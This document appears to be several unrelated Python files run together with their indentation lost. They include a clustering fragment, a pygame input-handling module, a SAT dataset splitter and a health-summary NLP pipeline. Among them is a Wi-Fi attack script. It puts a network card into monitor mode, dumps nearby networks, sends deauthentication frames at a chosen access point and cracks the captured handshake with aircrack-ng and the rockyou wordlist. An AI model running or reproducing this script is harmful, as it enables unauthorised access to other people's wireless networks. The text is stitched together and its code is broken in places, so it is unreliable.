Xxs = np.array(Xx).reshape(-1, 1)
Xys = np.array(Xy).reshape(-1, 1)
# print(X)
# #############################################################################
# Compute DBSCAN
Xxs = Xxs if triple \
else [t[1] for t in [Xxs[i:i+3] for i in range(0, len(Xxs), 3)]]
print(sorted([list(x)[0] for x in Xxs]))
dbx = DBSCAN(eps=0.02, min_samples=1).fit(Xxs)
# dbx = MeanShift().fit(Xxs)
core_samples_mask = np.zeros_like(dbx.labels_, dtype=bool)
# core_samples_mask[dbx.core_sample_indices_] = True
labels = dbx.labels_
# Number of clusters in labels, ignoring noise if present.
n_clusters_ = len(set(labels)) - (1 if -1 in labels else 0)
n_noise_ = list(labels).count(-1)
print("n_cols total", n_clusters_)
tricol = [labels[i:i+3] for i in range(0, len(labels), 3)] if triple else labels
print([tcol for tcol in tricol])
print(len(tricol), len(words))
for word, col in zip(words, tricol): # majority vote if triple
word['cluster-col'] = max(col, key=list(col).count) if triple else col
# #############################################################################
Xys = [t[1] for t in [Xys[i:i+3] for i in range(0, len(Xys), 3)]]
# Xys = np.array(Xys).reshape(-1, 1)
dby = DBSCAN(eps=0.02, min_samples=1).fit(Xys)
core_samples_mask = np.zeros_like(dby.labels_, dtype=bool)
core_samples_mask[dby.core_sample_indices_] = True
labels = dby.labels_
# Number of clusters in labels, ignoring noise if present.
n_clusters_ = len(set(labels)) - (1 if -1 in labels else 0)
n_noise_ = list(labels).count(-1)
print("n_rows total", n_clusters_)
trirow = labels#[list(labels[i:i+3]) for i in range(0, len(labels), 3)]
print(trirow)
for word, row in zip(words, trirow):
word['cluster-row'] = row#max(row, key=list(row).count) # majority vote
# # #############################################################################
# dby = DBSCAN(eps=0.05, min_samples=10).fit(Xys)
# core_samples_mask = np.zeros_like(db.labels_, dtype=bool)
# core_samples_mask[db.core_sample_indices_] = True
# labels = db.labels_
# # Number of clusters in labels, ignoring noise if present.
# n_clusters_ = len(set(labels)) - (1 if -1 in labels else 0)
# n_noise_ = list(labels).count(-1)
# trirow = [list(labels[i:i+3]) for i in range(0, len(labels), 3)]
# print(trirow)
# for word, row in zip(words, trirow):
# word['cluster-row'] = max(set(row), key=list(row).count) # majority vote
return words |
#!/usr/bin/env python
import subprocess
import os
import time
import string
import csv
dev_list = [] # to create file
dev_list_1 = [] # final device list
dev_list_2 = [] # Dumped list
dev_list_3 = [] # Dumped list 2
def return_fw():
bashCommand = ". ./cyanide-framework.sh && main"
subprocess.call(['bash','-c', bashCommand])
def get_dev():
count = 1
global lele
command = "ip -br link show | awk '{print $1}'"
qwerty = subprocess.check_output(['bash', '-c', command]).decode("utf-8")
dev_list.append(qwerty)
f = open("devlist.txt", "w")
for i in dev_list:
f.write(i)
f.close()
y = open("devlist.txt", "r")
for x in y:
dev_list_1.append(x)
print(count, ")", x)
count += 1
y.close()
lele = len(dev_list_1)
def choosing_and_monitoring():
get_dev()
global option
print("Enter the Option 1 -",lele," :")
option = int(input("Option: "))
if option <= lele:
iface = dev_list_1[option - 1]
print(type(iface))
print(iface)
cmd_1 = "airmon-ng start" + " " + iface
subprocess.run(["bash", "-c", cmd_1])
elif (option <= 0) or (option > lele) :
print("[-]Wrong Option. Please Try Again")
choosing_and_monitoring()
# going in monitor mode
def list_empty():
dev_list.clear()
dev_list_1.clear()
def dumping():
count = 0
global bssid
global channel
global iface_1
iface_1 = dev_list_1[option-1]
cmd_dump = 'xterm -T "Dumping Networks" -fa monaco -fs 13 -bg red -e "airodump-ng ' + iface_1 + ' -w output --output-format csv"'
subprocess.call(['bash', '-c', cmd_dump])
csv_file = open("output-01.csv", "r")
csv_read = csv.reader(csv_file)
for i in csv_read:
if len(i) != 0:
dev_list_2.append(i)
for j in range(len(dev_list_2) - 4):
if dev_list_2[j][13] != " ":
a = dev_list_2[j][13]
b = dev_list_2[j][0]
c = dev_list_2[j][3]
print("%d, %-15s, %-15s, %-6s" %(count, a,b,c))
count += 1
print("Please Select the Network in Your Area: ")
option_2 = int(input("Enter the Serial Number: "))
if (option_2 <=0) or (option_2 >=len(dev_list_2)-4):
print("[-] Wrong Option. Please Try Again :( ")
dumping()
elif (option_2 >0) or (option_2 <=len(dev_list_2)-4):
bssid = dev_list_2[option_2][0]
channel = dev_list_2[option_2][3]
cmd_dump_1 = 'xterm -T "Dumping Specific Network" -fa monaco -fs 13 -bg red -e "airodump-ng --bssid '+ bssid + ' --channel' + channel + " " + iface_1 + ' -w output_2 --output-format csv"'
subprocess.call(['bash', '-c', cmd_dump_1])
def lets_play():
cmd_play = 'xterm -T "Dumping Specific Network" -fa monaco -fs 13 -bg red -e "aireplay-ng -0 100 -a '+ bssid + iface_1
subprocess.call(["bash","-c",cmd_play])
def pass_crack():
cmd = 'xterm -T "Cr4cKinG PasSw0rD" -fa monaco -fs 13 -bg red -e "aircrack-ng hack1-01.cap -w /usr/share/wordlists/rockyou.txt -l keyfound.txt"'
subprocess.call(["bash", "-c", cmd])
cmd_rmv = "rm -rf hack1-*"
subprocess.call(["bash", "-c", cmd_rmv])
cmd_shw_key = "cat keyfound.txt"
subprocess.call(["bash", "-c", cmd_shw_key])
try:
print("[*] There are the following Network Interfaces")
choosing_and_monitoring()
print("[*] Monitor Mode Achieved")
time.sleep(4.5)
dumping()
except KeyboardInterrupt:
return_fw()
pass_crack()
|
from dataclasses import dataclass
from typing import Dict, Union, Set
import pygame
from game.constants import DEBUG
from game.util import clamp
from game.base.signal import Signal
class ButtonInput:
def match(self, event) -> bool:
return False
def update(self, event):
if self.match(event):
return self.pressed(event)
return None
def pressed(self, event) -> bool:
"""Whether a matching event is a press or a release"""
return False
@dataclass(frozen=True)
class KeyPress(ButtonInput):
key: int
def match(self, event):
return event.type in (pygame.KEYDOWN, pygame.KEYUP) and event.key == self.key
def pressed(self, event) -> bool:
"""Whether a matching event is a press or a release"""
return event.type == pygame.KEYDOWN
@dataclass(frozen=True)
class JoyButton(ButtonInput):
joy_id: int
button: int
def match(self, event):
return (
event.type in (pygame.JOYBUTTONDOWN, pygame.JOYBUTTONUP)
and event.joy == self.joy_id
and event.button == self.button
)
def pressed(self, event):
"""Whether a matching event is a press or a release"""
return event.type == pygame.JOYBUTTONDOWN
@dataclass(frozen=True)
class JoyAxisTrigger(ButtonInput):
joy_id: int
axis: int
threshold: int = 0.5
above: bool = True
"""Whether the button is pressed when the value is above or below the threshold"""
def match(self, event) -> bool:
return (
event.type == pygame.JOYAXISMOTION
and event.joy == self.joy_id
and event.axis == self.axis
)
def pressed(self, event) -> bool:
return self.above == (event.value > self.threshold)
@dataclass(frozen=True)
class JoyAxis:
joy_id: int
axis: int
reversed: bool = False
sensibility: float = 1.0
threshold: float = 0.2
def match(self, event):
return (
event.type == pygame.JOYAXISMOTION
and event.joy == self.joy_id
and event.axis == self.axis
)
def value(self, event):
"""The value of a matching event."""
if abs(event.value) < self.threshold:
return 0
scaled = event.value * self.sensibility
if self.reversed:
return -scaled
else:
return scaled
class Button:
def __init__(self, *keys):
"""
A boolean input.
:param keys: any number of keycodes or ButtonInputs
"""
self._keys: Set[ButtonInput] = {
KeyPress(key) if isinstance(key, int) else key for key in keys
}
self._pressed = {}
self.just_released = False
self.just_pressed = False
self.just_double_pressed = False
self._always = Signal()
self._on_press = Signal()
self._on_release = Signal()
self._on_double_press = Signal()
self._repeat = Signal() # _repeat[callback] = [delay, trigger_count]
self.last_press = float("-inf")
"""Time since last release of the button"""
self.press_time = 0
self.dt = 0 # time since last frame
"""
Time the button has been pressed.
If it isn't pressed, it is the duration of the last press.
"""
def update(self, dt):
"""Trigger all callbacks and updates times"""
self.last_press += dt
if self.pressed:
self.press_time += dt
self.dt = dt
self._always(self)
if self.just_pressed:
self._on_press(self)
if self.just_double_pressed:
self._on_double_press(self)
if self.just_released:
self._on_release(self)
if self.pressed:
self._repeat.blocked += 1
for wref in self._repeat.slots:
c = wref()
if not c:
continue
if c.delay * c.repetitions <= self.press_time:
# It isn;t possible to set it directly, I don't know why
c.repetitions += 1
c(self)
self._repeat.blocked -= 1
self._repeat.refresh()
def event(self, events):
self.just_pressed = False
self.just_double_pressed = False
self.just_released = False
old_pressed = self.pressed
for event in events:
for key in self._keys:
if key.match(event):
self._pressed[key] = key.pressed(event)
if not old_pressed:
if self.pressed:
self.press_time = 0
self.just_pressed = True
if self.double_pressed:
self.just_double_pressed = True
else:
if not self.pressed:
# All keys were just released
self.last_press = 0
self.just_released = True
for wref in self._repeat.slots:
c = wref()
if not c:
continue
c.repetitions = 0
@property
def pressed(self):
"""Whether the button is actually pressed."""
return sum(self._pressed.values(), 0) > 0
@property
def double_pressed(self):
"""Whether the button was just double pressed"""
return self.pressed and self.last_press < 0.1
def always_call(self, callback):
return self._always.connect(callback)
def on_press(self, callback):
return self._on_press.connect(callback)
def on_release(self, callback):
return self._on_release.connect(callback)
def on_double_press(self, callback):
return self._on_double_press.connect(callback)
def on_press_repeated(self, callback, delay):
"""
Call `callback` when the button is pressed and
every `delay` seconds while it is pressed.
Note: the same function cannot be a repeat callback
for two different things.
"""
slot = self._repeat.connect(callback)
slot.delay = delay
slot.repetitions = 0
return slot
def disconnect(self, callback):
"""Remove a callback from all types if present."""
if callback in self._always:
self._always.disconnect(callback)
if callback in self._on_press:
self._on_press.disconnect(callback)
if callback in self._on_release:
self._on_release.disconnect(callback)
if callback in self._on_double_press:
self._on_double_press.disconnect(callback)
if callback in self._repeat:
self._on_double_press.disconnect(callback)
class Axis:
def __init__(self, negative, positive, *axis, smooth=0.1):
"""
An input axis taking values between -1 and 1.
Callbacks are disconnected with -=
:param negative: keycode or list of keycodes
:param positive: keycode or list of keycodes
:param axis: any number of JoyAxis
:param smooth: Duration (s) to smooth values
"""
if isinstance(negative, int):
negative = [negative]
if isinstance(positive, int):
positive = [positive]
self._negative = {KeyPress(n): False for n in negative}
self._positive = {KeyPress(p): False for p in positive}
self._axis = set(axis)
self._callbacks = Signal()
self._smooth = smooth
self.non_zero_time = 0
self.zero_time = 0
# Hold the number of keys pressed
self._int_value = 0
# Hold the smoothed number of keys pressed
self._value = 0
# Hold the total value of axis,
# separately because of different tracking methods
self._axis_value = 0
def __str__(self):
return f"Axis({self.value})"
@property
def value(self):
return clamp(self._value + self._axis_value, -1, 1)
def always_call(self, callback):
return self._callbacks.connect(callback)
def __isub__(self, callback):
return self._callbacks.disconnect(callback)
def update(self, dt):
"""Trigger all callbacks and updates times"""
if self._int_value != 0:
# Nonzero check is okay as JoyAxis already count the threshold
self.non_zero_time += dt
self.zero_time = 0
else:
self.non_zero_time = 0
self.zero_time += dt
if self._smooth <= 0:
self._value = self._int_value
else:
dv = dt / self._smooth
if self._int_value > 0:
self._value += dv
elif self._int_value < 0:
self._value -= dv
else:
if self._value > 0:
self._value -= dv
else:
self._value += dv
if abs(self._value) <= dv:
# To have hard zeros
self._value = 0
self._value = clamp(self._value, -1, 1)
self._callbacks(self)
def event(self, events):
axis_value = 0
any_axis = False
for event in events:
for pos in self._positive:
if pos.match(event):
self._positive[pos] = pos.pressed(event)
for neg in self._negative:
if neg.match(event):
self._negative[neg] = neg.pressed(event)
for axis in self._axis:
if axis.match(event):
# We take the most extreme value
val = axis.value(event)
if abs(val) > abs(axis_value):
axis_value = val
any_axis = True
self._int_value = sum(self._positive.values()) - sum(self._negative.values())
if any_axis:
self._axis_value = axis_value
class Inputs(dict, Dict[str, Union[Button, Axis]]):
def update(self, dt):
"""Trigger all callbacks and updates times"""
for inp in self.values():
inp.update(dt)
def event(self, events):
"""Actualize buttons and axis."""
for inp in self.values():
inp.event(events)
if DEBUG:
for event in events:
print(event)
|
import os
from tqdm import tqdm
PATH = "./data/mini_GIFT"
#"./data/Mini_GIFT_poubelle" #"./data/mini_GIFT"
#filenames = os.listdir("./data/Mini_GIFT_poubelle")
filenames = os.listdir(PATH)
dico_name = {"5":{"UNSAT.DIMACS":[], "SAT.DIMACS":[]}, "6":{"UNSAT.DIMACS":[], "SAT.DIMACS":[]}, "7":{"UNSAT.DIMACS":[], "SAT.DIMACS":[]}}
for filename in tqdm(filenames):
if ("dico_" in filename ):
liste_interet = filename.split('_')
dico_name[liste_interet[0]][liste_interet[-1]].append(int(liste_interet[1]))
dico_max = {"5":0, "6":0, "7":0}
cpt = 0
for round in ["5", '6', "7"]:
lst1 = dico_name[round]["UNSAT.DIMACS"]
lst2 = dico_name[round]["SAT.DIMACS"]
if len(lst1)>0 and len(lst2)>0:
lst3 = [max(lst1), max(lst2)]
dico_max[round] = max(lst3)
os.makedirs(PATH + "/train/dimacs/", exist_ok=True)
os.makedirs(PATH + "/train/pickle/", exist_ok=True)
os.makedirs(PATH + "/val/dimacs/", exist_ok=True)
os.makedirs(PATH + "/val/pickle/", exist_ok=True)
os.makedirs(PATH + "/test/dimacs/", exist_ok=True)
os.makedirs(PATH + "/test/pickle/", exist_ok=True)
for round in ["5", '6', "7"]:
print(round)
print(dico_max[round]-1)
start_train = 0
end_train = int(0.6*dico_max[round]-1)
start_val = int(0.6*dico_max[round]-1)
end_val = int(0.8*dico_max[round]-1)
start_test = int(0.8*dico_max[round]-1)
end_test =dico_max[round]-1
for index in tqdm(range(start_train, end_train)):
for end in ["UNSAT.DIMACS", "SAT.DIMACS"]:
liste_interet2 = str(round)+"_"+str(index+1)+"_"+liste_interet[2] +"_"+liste_interet[3]+"_" + end
os.rename(PATH+"/"+ liste_interet2, PATH+ "/train/dimacs/" +liste_interet2)
for index in tqdm(range(start_val, end_val)):
for end in ["UNSAT.DIMACS", "SAT.DIMACS"]:
liste_interet2 = str(round)+"_"+str(index+1)+"_"+liste_interet[2] +"_"+liste_interet[3]+"_" + end
os.rename(PATH+"/"+ liste_interet2, PATH+ "/val/dimacs/" +liste_interet2)
for index in tqdm(range(start_test, end_test)):
for end in ["UNSAT.DIMACS", "SAT.DIMACS"]:
liste_interet2 = str(round)+"_"+str(index+1)+"_"+liste_interet[2] +"_"+liste_interet[3]+"_" + end
os.rename(PATH+"/"+ liste_interet2, PATH+ "/test/dimacs/" +liste_interet2) |
import json
from tqdm import tqdm
import pdb
import pickle
import nltk
import numpy as np
from get_model_performances import _get_entities, _get_entity_embeddings
from bart_summarization import get_closest_terms
from analysis.map_condition_phrases import read_embeddings
from evaluation.create_kg import create_entity_annotations_file, _perform_tagging, get_sentence_entities
from evaluation.create_kg import _read_entity_file, create_relation_annotations_file, produce_re_outputs, get_predicted_relations
import random
import jsonlines
from metapub import PubMedFetcher
random.seed(42)
def analyse_scoping(data, selected_so_far):
summaries = []
for file_name in tqdm(data):
if 'summary_inputs' not in data[file_name]:
continue
if 'summary_healthline_entity_annotations' not in \
data[file_name]['summary_inputs']:
continue
for sentence_tuple in data[file_name]['summary_inputs']\
['summary_healthline_entity_annotations']:
summary = sentence_tuple[0]
entities= sentence_tuple[1]
if summary.strip() in selected_so_far or \
summary in selected_so_far or \
is_insufficient(summary):
continue
assert "more research" not in summary[0]
populations = _get_entities(summary.split(),entities.split(),\
'Population')
if len(set(populations)) != 1:
continue
if all([x not in populations[0] for x in \
['human','rat','animal','cell','men','women',\
'adult humans']]):
summaries.append(summary.strip())
print(len(summaries))
return summaries
def analyse_contradictions(data, selected_so_far):
subtitles = []
summaries = []
for file_name in tqdm(data):
if 'headings_inputs' not in data[file_name]:
continue
if 'summary_inputs' not in data[file_name]:
continue
for summary,subtitle in zip(data[file_name]['summary_inputs']\
['summary_healthline_entity_annotations'],\
data[file_name]['headings_inputs']\
['headings_healthline_text'].keys()):
if summary[0].strip() in selected_so_far or \
summary[0] in selected_so_far or \
is_insufficient(summary[0]):
continue
if any([x in summary[0].lower() for x in \
['conflict','contradict','evidence is mixed']]):
subtitles.append(subtitle)
summaries.append(summary[0].strip())
print(len(summaries))
return summaries
def analyse_insufficient(data, selected_so_far):
subtitles = []
summaries = []
for file_name in tqdm(data):
if 'headings_inputs' not in data[file_name]:
continue
if 'summary_inputs' not in data[file_name]:
continue
for summary,subtitle in zip(data[file_name]['summary_inputs']\
['summary_healthline_entity_annotations'],\
data[file_name]['headings_inputs']\
['headings_healthline_text'].keys()):
if summary[0].strip() in selected_so_far or \
summary[0] in selected_so_far or \
is_contradiction(summary[0]):
continue
if any([x in summary[0].lower() for x in \
['more research','further research',\
'additional research', 'more human research',\
'further human research', 'additional human research']]):
subtitles.append(subtitle)
summaries.append(summary[0].strip())
print(len(summaries))
return summaries
def certain_results(data, selected_so_far):
subtitles = []
summaries = []
for file_name in tqdm(data):
if 'headings_inputs' not in data[file_name]:
continue
if 'summary_inputs' not in data[file_name]:
continue
for summary, subtitle in zip(data[file_name]['summary_inputs']\
['summary_healthline_entity_annotations'],\
data[file_name]['headings_inputs']\
['headings_healthline_text'].keys()):
if summary[0].strip() in selected_so_far or \
summary[0] in selected_so_far:
continue
if not any([x in summary[0].lower() for x in \
['more research','further research',\
'additional research','conflict','contradict','may']]):
subtitles.append(subtitle)
summaries.append(summary[0].strip())
print(len(summaries))
return summaries
def is_input_contradictions(data, input_pubmeds, file_name):
pubmed_causes = pickle.load(open("pubmed_causes.p","rb"))
pubmed_causes_dicts = {}
for pubmed, causes in pubmed_causes.items():
pubmed_causes_dicts[pubmed] = {}
for cause in causes:
if cause[2] == 'None':
continue
pubmed_causes_dicts[pubmed][tuple(cause[:2])] = cause[2]
all_causes = [pubmed_causes_dicts.get(pubmed,{}) \
for pubmed in input_pubmeds]
contradiction = False
for I in range(len(all_causes)):
for J in range(I+1,len(all_causes)):
if I == J:
continue
for i_cause, i_value in all_causes[I].items():
for j_cause, j_value in all_causes[J].items():
if i_value == 'None' or \
j_value == 'None':
continue
if i_cause == j_cause and i_value != j_value:
contradiction = True
break
if contradiction:
break
if contradiction:
break
if contradiction:
break
return contradiction
def is_input_not_enough(data, input_pubmeds, file_name):
if len(set(input_pubmeds)) == 1:
return True
return False
def is_input_scoping(data, input_pubmeds, file_name):
relation_annotations = pickle.load(open("sentence_relation_annotations.p",\
"rb"))
populations = []
for pubmed in input_pubmeds:
if pubmed not in data['pubmed_sentences_annotations']:
continue
if 'pubmed_sentences_relation_annotations' not in \
data['pubmed_sentences_annotations'][pubmed]:
continue
relations = data['pubmed_sentences_annotations'][pubmed]\
['pubmed_sentences_relation_annotations'][7]
populations += [relation[0] for relation in relations]
populations = list(set(populations))
return len(populations) == 1
def is_input_certain(data, input_pubmeds, file_name):
return not (is_input_contradictions(data, input_pubmeds, file_name) or\
is_input_not_enough(data, input_pubmeds, file_name) or\
is_input_scoping(data, input_pubmeds, file_name))
def input_contradictions(data, selected_so_far):
subtitles = []
summaries = []
pubmed_causes = pickle.load(open("pubmed_causes.p","rb"))
pubmed_causes_dicts = {}
for pubmed, causes in pubmed_causes.items():
pubmed_causes_dicts[pubmed] = {}
for cause in causes:
if cause[2] == 'None':
continue
pubmed_causes_dicts[pubmed][tuple(cause[:2])] = cause[2]
for file_name in tqdm(data):
if 'summary_inputs' not in data[file_name]:
continue
if 'summary_pubmed_articles' not in data[file_name]['summary_inputs']:
continue
for summary,pubmeds in data[file_name]['summary_inputs']\
['summary_pubmed_articles'].items():
if summary.strip() in selected_so_far:
continue
if len(pubmeds) == 0:
continue
all_causes = [pubmed_causes_dicts.get(pubmed,{})\
for pubmed in pubmeds]
contradiction = False
for I in range(len(all_causes)):
for J in range(I+1,len(all_causes)):
if I == J:
continue
for i_cause, i_value in all_causes[I].items():
for j_cause, j_value in all_causes[J].items():
if i_value == 'None' or \
j_value == 'None':
continue
if i_cause == j_cause and i_value != j_value:
if i_value in ['decreases','controls'] \
and j_value in ['decreases','controls']:
continue
if i_value in ['increases','satisfies'] \
and j_value in ['increases','satisfies']:
continue
contradiction = True
break
if contradiction:
break
if contradiction:
break
if contradiction:
break
if contradiction:
break
if contradiction:
summaries.append(summary.strip())
print(len(summaries))
return summaries
def input_not_enough(data, selected_so_far):
summaries = []
subtitles = []
for file_name in tqdm(data):
if 'summary_inputs' not in data[file_name]:
continue
if 'summary_pubmed_articles' not in data[file_name]['summary_inputs']:
continue
for summary,pubmeds in data[file_name]['summary_inputs']\
['summary_pubmed_articles'].items():
if summary.strip() in selected_so_far:
continue
if len(pubmeds) == 0:
continue
if len(set(pubmeds)) in [1]:
summaries.append(summary.strip())
print(len(summaries))
return summaries
def input_scoping(data, selected_so_far):
summaries = []
subtitles = []
relation_annotations = pickle.load(open("sentence_relation_annotations.p",\
"rb"))
sentence_populations = {}
for file_name in tqdm(data):
if 'summary_inputs' not in data[file_name]:
continue
if 'summary_pubmed_articles' not in data[file_name]['summary_inputs']:
continue
for summary,pubmeds in data[file_name]['summary_inputs']\
['summary_pubmed_articles'].items():
if summary.strip() in selected_so_far:
continue
if len(pubmeds) == 0:
continue
if summary.strip() not in relation_annotations:
continue
#populations = \
# [relation_annotations[summary.strip()][1][7][i][0]\
# for i in range(len(\
# relation_annotations[summary.strip()][1][7]))]
populations = []
for p in data['pubmed_sentences_annotations']:
if p not in pubmeds:
continue
current_population = []
if 'pubmed_sentences_entity_annotations' not in \
data['pubmed_sentences_annotations'][p]:
continue
for sent_ann in data['pubmed_sentences_annotations'][p]\
['pubmed_sentences_entity_annotations']:
sent,ann = sent_ann[0], sent_ann[1]
current_population += _get_entities(sent.split(),\
ann.split(),'Population')
populations += current_population
if len(populations) == 0:
continue
if any([x in populations for x in ['men','women',\
'participants','human','humans','subjects']]):
continue
#if any([[x in y for y in populations] for x in ['healthy']]):
# continue
if len(set(populations)) <= 1:
summaries.append(summary.strip())
sentence_populations[summary.strip()] = \
list(set(populations))[0]
print(len(summaries))
pickle.dump(sentence_populations, open("scoping_populations.p","wb"))
return summaries
def input_certain(data, selected_so_far):
summaries = []
for file_name in tqdm(data):
if 'summary_inputs' not in data[file_name]:
continue
if 'summary_pubmed_articles' not in data[file_name]['summary_inputs']:
continue
for summary,pubmeds in data[file_name]['summary_inputs']\
['summary_pubmed_articles'].items():
if len(pubmeds) > 0 and summary.strip() not in selected_so_far:
summaries.append(summary.strip())
print(len(summaries))
return summaries
def get_sentence_annotations():
dictionary = pickle.load(open("categorized_output_summaries.p","rb"))
f = open("categorized_entity_input.txt","w")
for type,sentences in dictionary.items():
for sentence in sentences:
words = nltk.tokenize.word_tokenize(sentence)
for word in words:
f.write(word + " O\n")
f.write("\n")
f.close()
def is_contradiction(sentence):
if any([x in sentence.lower() for x in \
['conflict','contradict','evidence is mixed','mixed results']]):
return True
return False
def is_insufficient(sentence):
if any([x in sentence.lower() for x in \
['more research','further research',\
'additional research', 'more human research',\
'further human research', 'additional human research',\
'more high - quality studies']]):
return True
return False
def check_outputs(input_file_name,output_file_name,incorrect_input,\
incorrect_output):
output_lines = open(output_file_name, "r").readlines()
input_lines = open(input_file_name, "r").readlines()
incorrect_inputs = []
incorrect_outputs = []
for output, input in zip(output_lines, input_lines):
contradiction = is_contradiction(output.strip())
insufficient = is_insufficient(output.strip())
if contradiction and input.startswith("#4"):
continue
if insufficient and input.startswith("#2"):
continue
if (not (contradiction or insufficient)) and (input.startswith("#1") \
or input.startswith("#3")):
continue
incorrect_inputs.append(input)
incorrect_outputs.append(output)
print(len(incorrect_inputs))
f_in = open(incorrect_input, "w")
f_out= open(incorrect_output,"w")
for input,output in zip(incorrect_inputs,incorrect_outputs):
f_in.write(input.strip()+"\n")
f_out.write(output.strip()+"\n")
f_in.close()
f_out.close()
def check_pubmed_outputs(data):
pubmed_causes = pickle.load(open("pubmed_causes.p","rb"))
consider_sentences = set()
for pubmed in tqdm(data['pubmed_sentences_annotations']):
if 'pubmed_sentences_entity_annotations' not in data['pubmed_sentences_annotations'][pubmed]:
continue
for sentence_tuple in data['pubmed_sentences_annotations']\
[pubmed]['pubmed_sentences_entity_annotations']:
sentence, _ = sentence_tuple
current_causes = pubmed_causes.get(pubmed,set())
cause_consider = set([tuple(instances[:2]) for instances\
in current_causes if instances[2]!='None'])
if any([cause[0] in sentence and cause[1] in sentence\
for cause in cause_consider]):
consider_sentences.add(sentence)
categorized_pubmed_outputs = {}
for sentence in consider_sentences:
if is_contradiction(sentence):
categorized_pubmed_outputs['contradiction'] = \
categorized_pubmed_outputs.setdefault('contradiction',[])+\
[sentence]
elif is_insufficient(sentence):
categorized_pubmed_outputs['not_enough'] = \
categorized_pubmed_outputs.setdefault('not_enough',[])+\
[sentence]
else:
categorized_pubmed_outputs['certain'] = \
categorized_pubmed_outputs.setdefault('certain',[])+\
[sentence]
pickle.dump(categorized_pubmed_outputs,open("categorized_pubmed_"+\
"summaries.p","wb"))
def gather_multi_sentence_summaries(data):
sentences_pubmeds = {}
sentence_string_pubmeds = {}
grouped_sentences = []
categorized_sentences = {}
sentence_categories = {}
category_counts = {}
sentence_sentence_splits = {}
sentence_file_names = {}
for file_name in data:
if 'headings_inputs' not in data[file_name]:#['headings_inputs']['headings_healthline_text']
continue
if 'distant_mapped_sentences' not in data[file_name]:
continue
for heading in data[file_name]['headings_inputs']\
['headings_healthline_text']:
sentences = data[file_name]['headings_inputs']\
['headings_healthline_text'][heading]
if len([x for x in sentences if x!='' and x in\
data[file_name]['distant_mapped_sentences']]) == 0:
continue
sentences = [x \
for x in sentences if x!='' and x in\
data[file_name]['distant_mapped_sentences']]
pubmeds = [data[file_name]['distant_mapped_sentences'][x]\
for x in sentences]
grouped_sentences.append(" ".join(sentences).strip())
sentences_pubmeds[tuple(sentences)] = pubmeds
sentence_string_pubmeds[" ".join(sentences).strip()] = pubmeds
sentence_file_names[tuple(sentences)] = file_name
sentence_sentence_splits[" ".join(sentences).strip()] = \
sentences
sentence_category = "certain"
if is_contradiction(" ".join(sentences).strip()):
sentence_category = "contradiction"
elif is_insufficient(" ".join(sentences).strip()):
sentence_category = "not_enough"
sentence_categories[" ".join(sentences).strip()] = sentence_category
category_counts[sentence_category] = category_counts.setdefault(\
sentence_category,0) + 1
categorized_sentences[sentence_category] = categorized_sentences.\
setdefault(sentence_category,[]) + \
[" ".join(sentences).strip()]
old_sentences_pubmeds = pickle.load(open("multi_sentences_pubmeds.p","rb"))
pickle.dump(categorized_sentences,open(\
"output_categorized_multi_sentences.p","wb"))
pickle.dump(sentences_pubmeds,open(\
"multi_sentences_pubmeds.p","wb"))
assert sentences_pubmeds == old_sentences_pubmeds
pickle.dump(sentence_file_names,open(\
"multi_sentence_file_names.p","wb"))
create_entity_annotations_file(sum(sentence_sentence_splits.values(),[]),\
"/data/rsg/nlp/darsh/aggregator/crawl_websites/"+\
"NUT/model_sentences.txt")
_perform_tagging("demo.model_evaluation_decode.config")
machine_r_sentences, machine_labels = _read_entity_file(\
"/data/rsg/nlp/darsh/aggregator/crawl_websites"\
"/NUT/model_sentences_out.txt")
machine_sentence_entities = get_sentence_entities(machine_r_sentences,\
machine_labels)
machine_causes_input, machine_contains_input = \
create_relation_annotations_file(machine_sentence_entities,"model")
machine_causes_output = produce_re_outputs("model_causes.jsonl",\
"t3_causes")
machine_contains_output = produce_re_outputs("model_contains.jsonl",\
"t3_contains")
machine_causes = get_predicted_relations(\
machine_causes_input,machine_causes_output)
machine_contains = get_predicted_relations(\
machine_contains_input,machine_contains_output)
number_of_good_sentences = 0
good_category_counts= {}
food_terms = sum([machine_sentence_entities[x].get('Food',[]) for x in \
machine_sentence_entities.keys()],[])
nutrition_terms = sum([machine_sentence_entities[x].get('Nutrition',[]) for x in \
machine_sentence_entities.keys()],[])
condition_terms = sum([machine_sentence_entities[x].get('Condition',[]) for x in\
machine_sentence_entities.keys()],[])
embeddings = read_embeddings()
food_closest = get_closest_terms(food_terms,embeddings)
nutr_closest = get_closest_terms(nutrition_terms,embeddings)
cond_closest = get_closest_terms(condition_terms,embeddings)
train_source = open("multi_train.source","w")
train_target = open("multi_train.target","w")
multiplier = {'certain':0,'not_enough':14,'contradiction':44}
data_point_counts={}
sentence_tuple_causes = {}
for sentence_tuples in sentence_file_names:
sentence_tuple_causes[sentence_tuples] = []
for sentence in sentence_tuples:
sentence_tuple_causes[sentence_tuples].append([\
machine_causes.get(sentence,[]),\
machine_contains.get(sentence,[])])
pickle.dump(sentence_tuple_causes,\
open("sentence_tuple_causes.p","wb"))
for grouped_sentence in grouped_sentences:
split_sentences = sentence_sentence_splits[grouped_sentence]
good_candidate = False
for sentence in split_sentences:
sentence_cause = machine_causes.get(sentence,[])
sentence_contain = machine_contains.get(sentence,[])
if not(len(sentence_cause) == 0 and len(sentence_contain) == 0):
good_candidate = True
break
if good_candidate:
good_category_counts[sentence_categories[grouped_sentence]] = \
good_category_counts.setdefault(\
sentence_categories[grouped_sentence],0) + 1
number_of_good_sentences += 1
else:
continue
net_input = []
net_output= []
food_names=[]
cond_names=[]
nutr_names=[]
for sentence in split_sentences:
food_names += machine_sentence_entities[sentence].get('Food',[])
cond_names += machine_sentence_entities[sentence].get('Condition',[])
nutr_names += machine_sentence_entities[sentence].get('Nutrition',[])
sentence_causes = machine_causes.get(sentence,[])
sentence_contains = machine_contains.get(sentence,[])
indices = [sentence.index(c[1]) for c in sentence_contains]
indices = np.argsort(indices)
sentence_contains = [sentence_contains[i] for i in indices]
indices = [sentence.index(c[1]) for c in sentence_causes]
indices = np.argsort(indices)
sentence_causes = [sentence_causes[i] for i in indices]
if len(sentence_causes) == 0 and len(sentence_contains) == 0:
continue
good_text = "<blank> "
good_text += (sentence_contains+sentence_causes)[0][0] + " "
for c in sentence_contains:
good_text += "<contains> " + c[1] + " "
for c in sentence_causes:
good_text += "<"+c[2]+"> " + c[1] + " "
good_text += "<blank>"
net_input.append(good_text)
net_output.append(sentence)
if len(net_input) == 0:
continue
train_input = " |SEP| ".join(net_input).strip()
train_output= " |SEP| ".join(net_output).strip()
sample_text = random.choice(categorized_sentences[\
sentence_categories[grouped_sentence]])
if len(sample_text.split())+len(train_input.split())+len(train_output.split()) > 220:
continue
data_point_counts[sentence_categories[grouped_sentence]] =\
